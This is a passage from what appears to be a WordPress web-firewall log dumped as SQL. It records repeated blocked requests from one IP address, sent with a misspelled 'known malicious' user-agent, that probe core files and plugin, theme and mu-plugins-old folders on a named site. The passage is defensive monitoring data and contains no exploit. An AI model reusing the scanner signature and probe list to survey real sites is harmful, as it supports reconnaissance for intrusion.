User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134113,1699994913.948829,1699994913.932900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wpdb.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwZGIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134114,1699994912.393000,1699994912.377700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134115,1699994910.293388,1699994910.277000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-styles.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXN0eWxlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134116,1699994908.752365,1699994908.738800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-scripts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNjcmlwdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134117,1699994907.041333,1699994907.029400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134118,1699994905.527431,1699994905.518700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-duotone.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWR1b3RvbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134119,1699994903.753909,1699994903.744600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-template.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134120,1699994901.980299,1699994901.970900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-editor.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLWVkaXRvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134121,1699994897.177858,1699994897.168400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/mu-plugins-old/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy1vbGQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134122,1699994887.153539,1699994887.144600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134123,1699994879.019947,1699994878.998000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/blocks/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134124,1699994863.605634,1699994863.596000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-templates.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXRlbXBsYXRlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134125,1699994861.895747,1699994861.886900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-previews.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXByZXZpZXdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134126,1699994860.155392,1699994860.146500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/template-canvas.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RlbXBsYXRlLWNhbnZhcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134127,1699994858.582826,1699994858.573400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134128,1699994857.002871,1699994856.988900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134129,1699994855.330699,1699994855.321900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wpdb.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwZGIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134130,1699994853.626303,1699994853.617500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134131,1699994851.758257,1699994851.749500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-styles.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXN0eWxlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134132,1699994850.247058,1699994850.238300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-scripts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNjcmlwdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134133,1699994848.598687,1699994848.589900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134134,1699994847.021622,1699994847.012700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-duotone.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWR1b3RvbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134135,1699994845.326667,1699994845.311800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-template.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134136,1699994843.699295,1699994843.690500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-editor.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLWVkaXRvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134137,1699994835.836209,1699994835.827200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134138,1699994834.304392,1699994834.295500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/elementor/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3Iv\",\"category\":\"brute-force\",\"ssl\":1}'),(134139,1699994832.396110,1699994832.386600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 